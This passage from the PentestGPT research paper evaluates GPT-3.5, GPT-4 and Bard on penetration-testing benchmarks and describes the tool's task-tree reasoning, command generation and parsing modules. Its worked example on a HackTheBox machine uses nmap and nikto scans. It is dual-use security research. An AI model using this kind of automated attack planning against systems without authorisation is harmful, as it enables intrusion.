on easy difficulty targets and 27 out of 71 on medium ones, underlining its potential for significant contributions to more complex penetration testing scenarios. Though not as proficient as GPT-4, GPT-3.5 and Bard still show promise, completing 13 (18.31%) and 16 (22.54%) of sub-tasks on medium difficulty targets, respectively. However, the perfor- mance of all three models noticeably diminishes when chal- lenged with hard difficulty targets. While each model can complete the initial reconnaissance phase on these targets, they fall short in exploiting the identified vulnerability. This outcome is not entirely unexpected, as the hard difficulty machines are deliberately crafted to be exceedingly difficult. They often include services that appear vulnerable but are, in fact, non-exploitableâ a trait commonly referred to as rabbit holes [33]. Additionally, the routes to successfully exploiting these machines are typically inventive and unforeseeable, making them resistant to straightforward replication by au- tomated tools. | 2308.06782#22 | 2308.06782#24 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#24 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | For instance, the benchmark target Falafel involves deliberately crafted SQL injection vulnerabilities, which are resistant to sqlmap and can only be exploited through manually designed payloads. Existing LLMs do 6 not exhibit the capability to solve them solely without the guidance of human experts. Finding 1: Large Language Models (LLMs) have shown proficiency in conducting end-to-end penetration testing tasks but struggle to overcome challenges presented by more difficult targets. TABLE 2: Top 10 Types of Sub-tasks completed by each tool. Sub-Tasks Walkthrough GPT-3.5 GPT-4 General Tool Usage Port Scanning Web Enumeration Code Analysis Shell Construction Directory Exploitation General Privilege Escalation Flag Capture Passowrd/Hash Cracking Network Exploitation 25 9 18 18 11 11 8 8 8 7 4 9 4 4 3 1 2 1 2 1 10 9 8 5 7 7 4 5 4 3 Bard 7 9 4 4 4 1 3 2 2 2 We further examine the detailed sub-task completion performances of the three LLMs, as presented in Table 2. Analyzing the completion status, we identify several areas where LLMs excel. First, they adeptly utilize common pen- etration testing tools to interpret the corresponding outputs, especially in enumeration tasks correctly. For example, all three evaluated LLMs successfully perform all nine Port Scanning sub-tasks. They can configure the widely-used port scanning tool, nmap [25], comprehend the scan results, and formulate subsequent actions. Second, the LLMs reveal a deep understanding of prevalent vulnerability types, con- necting them to the services on the target system. This understanding is evidenced by the successful completion of sub-tasks related to various vulnerability types. Finally, LLMs demonstrate their effectiveness in code analysis and generation, particularly in the tasks of Code Analysis and Shell Construction. These tasks require the models to read and generate codes in different programming languages, essential in penetration testing. This often culminates in identifying potential vulnerabilities from code snippets and crafting the corresponding exploits. Notably, GPT-4 outper- forms the other two models regarding code interpretation and generation, marking it the most suitable candidate for penetration testing tasks. | 2308.06782#23 | 2308.06782#25 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#25 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Finding 2: LLMs can efficiently use penetration test- ing tools, identify common vulnerabilities, and interpret source codes to identify vulnerabilities. # 4.4. Comparative Analysis (RQ2) To address RQ2, we examine the problem-solving strate- gies that LLMs employ, contrasting them with human pen- etration testers. In each penetration testing trial, we concen- trate on two main aspects: (1) Identifying the unnecessary operations that LLMs prompt, which are not conducive to successful penetration testing, as compared to a standard | 2308.06782#24 | 2308.06782#26 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#26 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | TABLE 3: Top Unnecessary Operations Prompted by LLMs on the Benchmark Targets (counts per model and in total). Brute-Force: GPT-3.5 75, GPT-4 92, Bard 68, Total 235. CVE Study: GPT-3.5 29, GPT-4 24, Bard 28, Total 81. SQL Injection: GPT-3.5 14, GPT-4 21, Bard 16, Total 51. Command Injection: GPT-3.5 18, GPT-4 7, Bard 12, Total 37. TABLE 4: Top causes for failed penetration testing trials (counts per model and in total). Session context lost: GPT-3.5 25, GPT-4 18, Bard 31, Total 74. False Command Generation: GPT-3.5 23, GPT-4 12, Bard 20, Total 55. Deadlock operations: GPT-3.5 19, GPT-4 10, Bard 16, Total 45. False Scanning Output Interpretation: GPT-3.5 13, GPT-4 9, Bard 18, Total 40. False Source Code Interpretation: GPT-3.5 16, GPT-4 11, Bard 10, Total 37. Cannot craft valid exploit: GPT-3.5 11, GPT-4 15, Bard 8, Total 34. walkthrough; and (2) Understanding the specific factors that prevent LLMs from successfully executing penetration tests. We analyze the unnecessary operations prompted by LLMs by breaking down the recorded testing procedures into sub-tasks. We employ the same method to formulate benchmark sub-tasks, as Section 3 outlines. By comparing this to a standard walkthrough, we identify the primary sub-task trials that fall outside the standard walkthrough and are thus irrelevant to the penetration testing process. The results are summarized in Table 3. We find that the most prevalent unnecessary operation prompted by LLMs is brute force. For all services requiring password authentication, LLMs typically advise brute-forcing it. This is an ineffective strategy in penetration testing. We surmise that many hacking incidents in enterprises involve password cracking and brute force. | 2308.06782#25 | 2308.06782#27 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#27 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | LLMs learn these reports from accident reports and are consequently considered viable solutions. Besides brute force, LLMs suggest that testers engage in CVE studies, SQL injections, and command injections. These recommen- dations are common, as real-world penetration testers often prioritize these techniques, even though they may not always provide the exact solution. We further investigate the reasons behind the failure of penetration testing trials. We manually categorize the causes of failure for the 195 penetration testing trials, with the results documented in Table 4. This table reveals that the predominant cause of failure is the loss of session context. The three examined models face difficulties in maintain- ing long-term conversational memory uniformly, frequently forgetting previous test results as the dialogue progresses. This lack of retention may be attributable to the limited token size within the LLM conversation context. | 2308.06782#26 | 2308.06782#28 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#28 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Given the intricate nature of penetration testingâ where a tester must skillfully link minor vulnerabilities across different services to develop a coherent exploitation strategyâ this loss of context substantially undermines the modelsâ effectiveness. Finding 3: LLMs struggle to maintain long-term mem- ory, which is vital to link vulnerabilities and develop exploitation strategies effectively. Secondly, LLMs strongly prefer the most recent tasks, adhering rigorously to a depth-first search approach. They concentrate on exploiting the immediate service, rarely devi- ating to a new target until all potential paths for the current one have been pursued. This can be attributed to the atten- tion of LLMs focusing more on the beginning and end of the prompt, as revealed in [34]. Experienced penetration testers generally assess the system from a broader standpoint, strategizing the subsequent steps likely to provide the most substantial results. When combined with the aforementioned memory loss issue, this tendency causes LLMs to become overly fixated on a specific service. As the test progresses, the models completely forget previous findings and reach a deadlock. Finding 4: LLMs strongly prefer recent tasks and a depth-first search approach, often resulting in an over- focus on one service and forgetting previous findings. Lastly, LLMs have inaccurate result generation and hallucination issues, as noted in [35]. This phenomenon ranks as the second most frequent cause of failures and is characterized by the generation of false commands. In our study, we observe that LLMs frequently identify the appropriate tool for the task but stumble in configuring the tools with the correct settings. In some cases, they even concoct non-existent testing tools or tool modules. | 2308.06782#27 | 2308.06782#29 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#29 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Finding 5: LLMs may generate inaccurate operations or commands, often stemming from inherent inaccuracies and hallucinations. Our exploratory study of three LLMs within penetra- tion testing reveals their potential for executing end-to-end tasks. Nevertheless, challenges arise in maintaining long- term memory, devising a testing strategy beyond a depth- first approach, and generating accurate operations. In the following section, we elucidate how we address these chal- lenges and outline our strategy for designing our LLM- powered penetration testing tool. | 2308.06782#28 | 2308.06782#30 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#30 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 5. Methodology # 5.1. Overview In light of the challenges identified in the preceding section, we present our proposed solution, PENTESTGPT, which leverages the synergistic interplay of three LLM- powered modules. As illustrated in Figure 3, PENTESTGPT incorporates three core modules: the Reasoning Module, the Generation Module, and the Parsing Module. Each module reserves one LLM session with its conversation and context. The user interacts seamlessly with PENTESTGPT, where distinct modules process different types of messages. | 2308.06782#29 | 2308.06782#31 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#31 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 8 This interaction culminates in a final decision, suggesting the subsequent step of the penetration testing process that the user should undertake. In the following sections, we eluci- date our design reasoning and provide a detailed breakdown of the engineering processes behind PENTESTGPT. # 5.2. Design Rationale Our central design considerations emerged from the three challenges observed in the previous Exploratory Study (Section 4): The first challenge (Finding 3) pertains to the issue of penetration testing context loss due to memory retention. LLMs in their original form struggle to maintain such long-term memory due to token size limits. The second obstacle (Finding 4) arises from the LLM chatbotsâ tendency to emphasize recent conversation content. In penetration testing tasks, this focuses on optimizing the immediate task. This approach falls short in the complex, interconnected task environment of penetration testing. The third obstacle (Finding 5) is tied to the inaccurate results generation by LLMs. When tasked to produce specific operations for a step in penetration testing directly, the outputs are often imprecise, sometimes even leading to PENTESTGPT has been engineered to address these challenges, rendering it more apt for penetration testing tasks. We drew inspiration from the methodologies em- ployed by real-world penetration testing teams, where a director plans overarching procedures, subdividing them into subtasks for individual testers. Each tester independently performs their task, reporting results without an exhaustive understanding of the broader context. The director then determines the following steps, possibly redefining tasks, and triggers the subsequent round of testing. Essentially, the director manages the overall strategy without becoming entrenched in the minutiae of the tests. This approach is mirrored in PENTESTGPTâ s functionality, enhancing its ef- ficiency and adaptability in conducting penetration tests. Our strategy divides penetration testing into two processes: iden- tifying the next task and generating the concrete operation to complete the task. Each process is powered by one LLM session. In this setup, the LLM session responsible for task identification retains the complete context of the ongoing penetration testing status. At the same time, the generation of detailed operations and parsing of information is managed by other sessions. This division of responsibilities fosters effective task execution while preserving the overarching context. To assist LLMs in effectively carrying out penetration testing tasks, we design a series of prompts that align with user inputs. | 2308.06782#30 | 2308.06782#32 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#32 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | We utilize the Chain-of-Thought (CoT) [36] methodology during this process. As CoT reveals, LLMsâ performance and reasoning capabilities can be significantly enhanced using the input, chain-of-thought, output prompt- ing format. Here, the chain-of-thought represents a series of intermediate natural language reasoning steps leading to the outcome. We dissect the penetration testing tasks into micro-steps and design prompts with examples to guide LLMs through processing penetration testing information Parsing Module Reasoning Module ' User Intention 7) FO Token Task Tree | â Subsequent | | Se Scocreseeeseee JET Ut Com Task Condenced Candidate @o â Operation | Information Tasks |. Generation _| i Testing Envrionmen| pasnpn esto can â â â â * : . . (Optional) User . Testing Targets }â Testing Tools * Verification â â â | 2308.06782#31 | 2308.06782#33 | 2308.06782 | [
"2305.13860"
]
|
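The division of responsibilities described above, one session that keeps the overall testing status and identifies the next task, plus separate sessions that generate concrete operations and parse verbose inputs, can be sketched as follows. All class and function names here are illustrative assumptions rather than the actual PentestGPT code; llm stands for any callable that sends a prompt to a chat session and returns the reply.

    class ReasoningSession:
        """Keeps the complete testing context (the task tree) and picks the next task."""
        def __init__(self, llm):
            self.llm = llm
            self.task_tree = "1. Perform reconnaissance (to-do)"

        def next_task(self, new_information):
            prompt = ("Here is the current task tree:\n" + self.task_tree +
                      "\nHere is the newest testing result:\n" + new_information +
                      "\nUpdate the tree and name the most promising to-do leaf task.")
            reply = self.llm(prompt)
            self.task_tree = reply          # simplified: keep the updated tree verbatim
            return reply

    class GenerationSession:
        """Turns one sub-task into concrete operations in an isolated session."""
        def __init__(self, new_llm_session):
            self.new_llm_session = new_llm_session

        def operations_for(self, task):
            llm = self.new_llm_session()    # fresh context for every sub-task
            steps = llm("Expand this penetration testing sub-task into detailed steps: " + task)
            return llm("Convert each step into an exact terminal command:\n" + steps)

    class ParsingSession:
        """Condenses verbose inputs (tool output, web pages, code) before reasoning."""
        def __init__(self, llm):
            self.llm = llm

        def condense(self, kind, raw_text):
            return self.llm(f"Summarize the essential findings in this {kind}:\n{raw_text}")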
2308.06782#33 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Operations Completed by LLM 7 3User Controlled Message (CJ Information to User Hidden Information Figure 3: Overview of PENTESTGPT. step-by-step, ultimately leading to the desired outcomes. The complete prompts are available at our anonymized open- source project [18]. # 5.3. Reasoning Module The Reasoning Module plays a pivotal role in our system, analogous to a team lead overseeing the penetration testing task from a macro perspective. It obtains testing results or intentions from the user and prepares the testing strategy for the next step. This testing strategy is passed to the generation module for further planning. | 2308.06782#32 | 2308.06782#34 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#34 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Port Scanning SSH Service Hit FTP Service t | â Anonymous Login (Succ) Web Service , nr 7 Direct Injection Point Enumeration Identification Brute Force (Fail) Hidden Admin Page Login a) PTT Representatoin To effectively supervise the penetration testing process and provide precise guidance, it is crucial to translate the testing procedures and outcomes into a natural language format. Drawing inspiration from the concept of an attack tree [37], which is often used to outline penetration testing procedures, we introduce the notion of a pentesting task tree (PTT). This novel approach to testing status representation is rooted in the concept of an attributed tree [38]: Definition 1 (Attributed Tree). A attributed tree is an edge- labeled, attributed polytree G = (V, E, λ, µ) where V is a set of nodes (or vertices), E is a set of directed edges, λ : | 2308.06782#33 | 2308.06782#35 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#35 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | E → Σ is an edge labeling function assigning a label from the alphabet Σ to each edge, and µ : (V ∪ E) × K → S is a function assigning key (from K)-value (from S) pairs of properties to the edges and nodes. [Task Tree: 1. Perform port scanning (completed) - Port 21, 22 and 80 are open. - Services are FTP, SSH, and Web Service. 2. Perform the testing 2.1 Test FTP Service 2.1.1 Test Anonymous Login (success) 2.1.1.1 Test Anonymous Upload (success) 2.2 Test SSH Service 2.2.1 Brute-force (failed) 2.3 Test Web Service (ongoing) 2.3.1 Directory Enumeration 2.3.1.1 Find hidden admin (to-do) 2.3.2 Injection Identification (to-do) | 2308.06782#34 | 2308.06782#36 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#36 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | b) PTT Representation in Natural Language Figure 4: Pentesting Task Tree in a) visualized tree format, and b) natural language format encoded in LLM. Given the definition of an attributed tree, the PTT is defined as follows: Definition 2 (Pentesting Task Tree). A PTT T is a pair (N, A), where: (1) N is a set of nodes organized in a tree structure. Each node has a unique identifier, and there is a special node called the root that has no parent. Each node, other than the root, has exactly one parent and zero or more children. (2) A is a function that assigns to each node n ∈ N a set of attributes A(n). Each attribute is a pair (a, v), where a is the attribute name and v is the attribute value. The set of attributes can be different for each node. | 2308.06782#35 | 2308.06782#37 | 2308.06782 | [
"2305.13860"
]
|
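Definition 2 can be read directly as a data structure: each node carries a unique identifier, a set of (attribute name, attribute value) pairs, and zero or more children. The Python sketch below is only a schematic encoding of the definition; inside PentestGPT the tree is held in natural-language form within the LLM context.

    from dataclasses import dataclass, field
    from typing import Dict, List

    @dataclass
    class PTTNode:
        """One node of a Pentesting Task Tree (Definition 2)."""
        identifier: str
        attributes: Dict[str, str] = field(default_factory=dict)   # the (a, v) pairs
        children: List["PTTNode"] = field(default_factory=list)

    # A fragment of the tree from Figure 4, encoded with this structure.
    root = PTTNode("root", {"task": "Penetration test the target"}, [
        PTTNode("1", {"task": "Perform port scanning", "status": "completed"}),
        PTTNode("2.1", {"task": "Test FTP service"}, [
            PTTNode("2.1.1", {"task": "Test anonymous login", "status": "success"}),
        ]),
    ])
    print(len(root.children), "top-level tasks")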
2308.06782#37 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | As outlined in Figure 3, the Reasoning Moduleâ s opera- tion unfolds over four key steps operating over the PTT. â ¶ Initially, the module absorbs the userâ s intentions to construct an initial PTT in the form of natural language. This is achieved by carefully instructing the LLM with examples and definitions of PPT using meticulously crafted prompts. The LLM outputs are parsed to confirm that the tree structure is accurately formatted. Note that due to the nature of the tree structure, it can be represented in the natural language format through layered bullets, as illustrated in Figure 4. The Reasoning Module effectively | 2308.06782#36 | 2308.06782#38 | 2308.06782 | [
"2305.13860"
]
|
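Because the PTT can be written as layered bullets (Figure 4b), moving between the tree and the natural-language form the LLM consumes is a plain depth-first traversal. The sketch below assumes nodes shaped like the PTTNode structure sketched earlier (identifier, attributes, children) and is illustrative only.

    from types import SimpleNamespace as Node

    def to_layered_bullets(node, depth=0):
        """Render a PTT node and its subtree as the layered-bullet text of Figure 4b."""
        status = node.attributes.get("status")
        suffix = f" ({status})" if status else ""
        lines = ["  " * depth + f"{node.identifier} {node.attributes['task']}{suffix}"]
        for child in node.children:
            lines.extend(to_layered_bullets(child, depth + 1))
        return lines

    demo = Node(identifier="1",
                attributes={"task": "Perform port scanning", "status": "completed"},
                children=[Node(identifier="1.1",
                               attributes={"task": "Identify services on open ports"},
                               children=[])])
    print("\n".join(to_layered_bullets(demo)))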
2308.06782#38 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 9 overcomes the memory-loss issue by maintaining a task tree that encompasses the entire penetration testing process. â · After updating the tree information, a verification step is conducted on the newly updated PTT to ascertain its correctness. This process checks explicitly that only the leaf nodes of the PTT have been modified, aligning with the principle that atomic operations in the penetration testing process should only influence the status of the lowest-level sub-tasks. This step confirms the correctness of the reason- ing process, safeguarding against any potential alterations to the overall tree structure due to hallucination by the LLM. If discrepancies arise, the information is reverted to the LLM for correction and regeneration. â ¸ With the updated PTT, the Reasoning Module evaluates the current tree state and pinpoints viable sub-tasks that can serve as candidate steps for further testing. â ¹ Finally, the module evaluates the likelihood of these sub-tasks leading to suc- cessful penetration testing outcomes. It then recommends the top task as the output. The expected results of this task are subsequently forwarded to the Generation Module for an in-depth analysis. This is feasible, as demonstrated in the exploratory study, since LLMs, particularly GPT-4, can identify potential vulnerabilities when provided with system status information. This procedural approach enables the Reasoning Module to address one of the inherent lim- itations of LLMs, precisely their tendency to concentrate solely on the most recent task. Note that in cases where the tester identifies that the correct task is incorrect or not completed in a preferred way, he could also manually revise the PTT through the interactive handle further discussed in Section 5.6. We devise four sets of prompts to sequentially guide the Reasoning Module through the completion of each stage. To bolster the reproducibility of our results, we optimize these prompts further with a technique known as hint gen- eration [39]. From our practical experience, we observe that LLMs are adept at interpreting the tree-structured infor- mation pertinent to penetration testing and can update it accurately in response to test outputs. # 5.4. Generation Module The Generation Module translates specific sub-tasks from the Reasoning Module into concrete commands or instructions. Each time a new sub-task is received, a fresh session is initiated in the Generation Module. This strategy effectively isolates the context of the overarching penetration task from the immediate task under execution, enabling the LLM to focus entirely on generating specific commands. | 2308.06782#37 | 2308.06782#39 | 2308.06782 | [
"2305.13860"
]
|
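The verification step ❷, which checks that an update touched only the lowest-level sub-tasks, can be approximated by comparing which lines have children before and after the update. The sketch below assumes the layered-bullet text format of Figure 4b and is an illustrative heuristic, not the exact check used by PentestGPT.

    def non_leaf_tasks(ptt_text):
        """Return the task lines that have at least one child, assuming the
        layered-bullet format where depth is encoded by indentation."""
        lines = [line for line in ptt_text.splitlines() if line.strip()]
        depths = [len(line) - len(line.lstrip()) for line in lines]
        return {
            lines[i].strip()
            for i in range(len(lines) - 1)
            if depths[i + 1] > depths[i]   # the next line is deeper, so this one is non-leaf
        }

    def only_leaves_changed(old_ptt, new_ptt):
        """Reject an update that removed or rewrote any existing non-leaf task line."""
        return non_leaf_tasks(old_ptt) <= non_leaf_tasks(new_ptt)

    old = "1. Perform reconnaissance\n  1.1 Port scanning (completed)"
    new = "1. Perform reconnaissance\n  1.1 Port scanning (completed)\n  1.2 Service identification (to-do)"
    print(only_leaves_changed(old, new))   # True: only leaf-level content was added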
2308.06782#39 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Instead of directly transforming the received sub-task into specific operations, our design employs the CoT strat- egy [36] to partition this process into two sequential steps. This design decision directly addresses the challenges as- sociated with model inaccuracy and hallucination by en- hancing the modelâ s reasoning capability. In particular, â º upon the receipt of a concise sub-task from the Reason- ing Module, the Generation Module begins by expanding it into a sequence of detailed steps. Notably, the prompt | 2308.06782#38 | 2308.06782#40 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#40 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | 10 associated with this sub-task requires the LLM to consider the possible tools and operations available within the testing environment. â » Subsequently, the Generation Module trans- forms each of these expanded steps into precise terminal commands ready for execution or into detailed descriptions of specific Graphical User Interface (GUI) operations to be carried out. This stage-by-stage translation eliminates poten- tial ambiguities, enabling testers to follow the instructions directly and seamlessly. Implementing this two-step process effectively precludes the LLM from generating operations that may not be feasible in real-world scenarios, thereby improving the success rate of the penetration testing proce- dure. By acting as a bridge between the strategic insights provided by the Reasoning Module and the actionable steps required for conducting a penetration test, the Generation Module ensures that high-level plans are converted into precise and actionable steps. This transformation process significantly bolsters the overall efficiency of the penetration testing procedure. | 2308.06782#39 | 2308.06782#41 | 2308.06782 | [
"2305.13860"
]
|
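A sketch of the two-step translation performed by the Generation Module: the sub-task is first expanded into detailed steps, and each step is then turned into an exact command. The prompt wording is illustrative, and new_session stands for a factory that opens a fresh chat session so the sub-task is handled in isolation.

    def generate_operations(sub_task, new_session):
        """Two-step Chain-of-Thought style generation for one sub-task."""
        llm = new_session()   # fresh session: isolates this sub-task from the overall context
        # Step 1: expand the concise sub-task into a sequence of detailed steps,
        # taking the tools available in the testing environment into account.
        steps = llm(
            "You are assisting a penetration test in an authorized lab environment.\n"
            "Expand the following sub-task into detailed, numbered steps, considering "
            f"the tools available on a standard Kali Linux machine:\n{sub_task}"
        )
        # Step 2: translate every step into an exact terminal command or a precise
        # description of the GUI operation to perform.
        commands = llm(
            "For each step below, output the exact terminal command to run, or a precise "
            f"description of the GUI operation if no command applies:\n{steps}"
        )
        return commands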
2308.06782#41 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | An Illustrative Example. We utilize a real-world running example to illuminate how the Reasoning Module and the Generation Module collaboratively operate to complete pen- etration testing tasks. Figure 5 illustrates a single iteration of PENTESTGPT working on the HackTheBox machine Car- rier [40], a medium-difficulty target. As depicted in a-1), the PTT, in natural language format, encodes the testing status, revealing the open ports (21, 22,80) on the target machine. The Reasoning Module is subsequently instructed to identify the available tasks. As highlighted in red, service scanning is the only available task on the leaf node of the PTT. This task is therefore chosen and forwarded to the Generation Module for command generation. The generated command is executed in the testing environment, and the execution result is conveyed to the Reasoning Module to update the PTT. In a-2), the Reasoning Module integrates the previous scanning result into the PTT, cross-referencing it with the earlier PTT to update only the leaf nodes. It then looks for the available tasks to execute. In this case, two tasks emerge: scanning the web service on port 80 and checking the SSH service for known vulnerabilities. The LLM evaluates which task is more promising and chooses to investigate the web service, often seen as more vulnerable. This task is passed to the Generation Module. The Generation Module turns this general task into a detailed process, employing nikto [41], a commonly used web scanning script. The iterative process continues until the tester completes the penetration testing task. # 5.5. Parsing Module The Parsing Module operates as a supportive interface, enabling effective processing of the natural language infor- mation exchanged between the user and the other two core modules. Two needs can primarily justify the existence of this module. First, security testing tool outputs are typically verbose, laden with extraneous details, making it compu- tationally expensive and unnecessarily redundant to feed Reasoning Module Task Tree: 1. Perform reconnaissance tasks b-1) Available Leaf-node Tasks â Available Tasks 1. Identify services running on (on-going) 1.1. Scan for open ports on the target machine (completed) = Port 21, 22 and 80 are open. I arte Decided Task Identify services running on open ports. = Port 21, 22 and 80 are open. 1.2. | 2308.06782#40 | 2308.06782#42 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#42 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 5, panels a-1 through e-1 (figure content): the task tree in natural language records that ports 21, 22, and 80 are open; the available leaf-node task "Identify services running on open ports" is decided and passed to the Generation Module; the generated command is "nmap -sV -p21,22,80 <ip-address>"; the execution result shows 21/tcp filtered ftp, 22/tcp open ssh OpenSSH 7.6p1, and 80/tcp open http Apache 2.4.18 (Service Info: OS: Linux); the updated task tree then exposes the tasks "Scan the web port" and "Check if the SSH service contains known vulnerabilities".] | 2308.06782#41 | 2308.06782#43 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#43 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 5, panels a-2 through e-2 (figure content): the updated task tree lists "2.1 Scan the web port" and "2.2 Check if the SSH service contains known vulnerabilities"; the decided task is passed to the Generation Module, which produces the command "nikto -h <ip-address>"; the execution result reports Server: Apache/2.4.18 (Ubuntu) and a missing anti-clickjacking X-Frame-Options header.] Figure 5: A demonstration of the task-tree update process on the testing target HTB-Carrier. these extended outputs directly into the LLMs. Second, users without specialized knowledge in the security domain may struggle to extract key insights from security testing outputs, presenting challenges in summarizing crucial testing information. Consequently, the Parsing Module is essential in streamlining and condensing this information. and users can always query the reasoning context without making unnecessary changes. If the user believes it necessary to update the PTT, they can explicitly instruct the model to update the reasoning context history accordingly. This provides a robust and flexible framework for the user to participate in the decision-making process actively. The Parsing Module is devised to handle four distinct types of information: (1) user intentions, which are directives provided by the user to dictate the next course of action, (2) security testing tool outputs, which represent the raw outputs generated by an array of security testing tools, (3) raw HTTP web information, which encompasses all raw information derived from HTTP web interfaces, and (4) source codes extracted during the penetration testing process. Users must specify the category of the information they provide, and each category is paired with a set of carefully designed prompts. For source code analysis, we integrate the GPT-4 code interpreter [42] to execute the task. | 2308.06782#42 | 2308.06782#44 | 2308.06782 | [
"2305.13860"
]
|
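Since each of the four information categories is paired with its own prompts, the Parsing Module can be sketched as a small dispatcher. The category names mirror the list above, while the prompt texts, the truncation limit, and the helper name are assumptions for illustration.

    # Hypothetical prompt templates, one per information category handled by the Parsing Module.
    PARSING_PROMPTS = {
        "user_intention": "Restate the user's intention as a concise testing directive:\n{text}",
        "tool_output": "Extract the security-relevant findings from this tool output:\n{text}",
        "http_web_info": "Summarize the key information in this raw HTTP/web content:\n{text}",
        "source_code": "Identify potentially vulnerable constructs in this source code:\n{text}",
    }

    def parse_information(category, text, llm, max_chars=20000):
        """Condense one piece of penetration-testing information before it reaches
        the Reasoning Module. `llm` is any callable from prompt to reply."""
        if category not in PARSING_PROMPTS:
            raise ValueError(f"Unknown information category: {category}")
        # Trim extremely long inputs first; verbose tool output is the common case.
        prompt = PARSING_PROMPTS[category].format(text=text[:max_chars])
        return llm(prompt)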
2308.06782#44 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 5.6. Active Feedback While LLMs can produce insightful outputs, their out- comes may sometimes require revisions. To facilitate this, we introduce an interactive handle in PENTESTGPT, known as active feedback, which allows the user to interact directly with the Reasoning Module. A vital feature of this process is that it does not alter the context within the Reasoning Module unless the user explicitly desires to update some information. The reasoning context, including the PTT, is stored as a fixed chunk of tokens. This chunk of tokens is provided to a new LLM session during an active feedback interaction, and users can pose questions regarding them. This ensures that the original session remains unaffected, # 5.7. Discussion We explore various design alternatives for PENTEST- GPT to tackle the challenges identified in Exploratory Study. We have experimented with different designs, and here we discuss some key decisions. Addressing Context Loss with Token Size: a straight- forward solution to alleviate context loss is the employment of LLM models with an extended token size. For instance, GPT-4 provides versions with 8k and 32k token size limits. | 2308.06782#43 | 2308.06782#45 | 2308.06782 | [
"2305.13860"
]
|
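The active-feedback behaviour described above, answering user questions against a frozen copy of the reasoning context without touching the original session, can be sketched as follows; the function and parameter names are illustrative assumptions.

    def active_feedback(reasoning_context, question, new_session):
        """Answer a user question about the current reasoning context (including the
        PTT) in a throwaway session, leaving the original Reasoning session untouched."""
        llm = new_session()                 # separate session: no side effects
        snapshot = str(reasoning_context)   # fixed chunk of tokens, passed read-only
        return llm(
            "Here is the current penetration testing context (task tree and findings):\n"
            f"{snapshot}\n\nAnswer the user's question about it without modifying it:\n{question}"
        )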
2308.06782#45 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | This approach, however, confronts two substantial chal- lenges. First, even a 32k token size might be inadequate for penetration testing scenarios, as the output of a single testing tool like dirbuster [43] may comprise thousands of tokens. Consequently, GPT-4 with a 32k limit cannot retain the entire testing context. Second, even when the entire conversation history fits within the 32k token boundary, the API may still skew towards recent content, focusing on local tasks and overlooking broader context. These issues guided us in formulating the design for the Reasoning Module and the Parsing Module. Vector Database to Improve Context Length: Another technique to enhance the context length of LLMs involves a vector database [44], [45]. By transmuting data into vec- tor embeddings, LLMs can efficiently store and retrieve information, practically creating long-term memory. | 2308.06782#44 | 2308.06782#46 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#46 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Theo- retically, penetration testing tool outputs could be archived 11 in the vector database. In practice, though, we observe that many results closely resemble and vary in only nuanced ways. This similarity often leads to confused information retrieval. Solely relying on a vector database fails to over- come context loss in penetration testing tasks. Integrating the vector database into the design of PENTESTGPT is an avenue for future research. Precision in Information Extraction: Precise informa- tion extraction is crucial for conserving token usage and avoiding verbosity in LLMs. Rule-based methods are com- monly employed to extract diverse information. However, rule-based techniques are engineeringly expensive given natural languageâ s inherent complexity and the variety of information types in penetration testing. We devise the Parsing Module to manage several general input information types, a strategy found to be both feasible and efficient. of LLMs: LLMs an all- encompassing solution. Present LLMs exhibit flaws, includ- ing hallucination [46] and outdated knowledge. Our miti- gation efforts, such as implementing task tree verification to ward off hallucination, might not completely prevent the Reasoning Module from producing erroneous outcomes. Thus, a human-in-the-loop strategy becomes vital, facilitat- ing the input of necessary expertise and guidance to steer LLMs effectively. | 2308.06782#45 | 2308.06782#47 | 2308.06782 | [
"2305.13860"
]
|
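The retrieval-confusion problem mentioned above, where near-identical tool outputs map to nearly identical embeddings, can be seen even with a toy vector store. The bag-of-words embedding below is a stand-in for a real embedding model and is used purely for illustration.

    from collections import Counter
    from math import sqrt

    def embed(text):
        """Toy bag-of-words embedding (a real system would use a learned embedding model)."""
        return Counter(text.lower().split())

    def cosine(a, b):
        dot = sum(a[w] * b[w] for w in a)
        norm = sqrt(sum(v * v for v in a.values())) * sqrt(sum(v * v for v in b.values()))
        return dot / norm if norm else 0.0

    # Two near-identical scan results and one distinct finding.
    store = [
        "22/tcp open ssh OpenSSH 7.6p1 Ubuntu",
        "22/tcp open ssh OpenSSH 8.2p1 Ubuntu",
        "80/tcp open http Apache httpd 2.4.18",
    ]
    query = "which ssh version is running on the target"
    scores = [(cosine(embed(query), embed(doc)), doc) for doc in store]
    # The two SSH entries score identically, illustrating why retrieval alone
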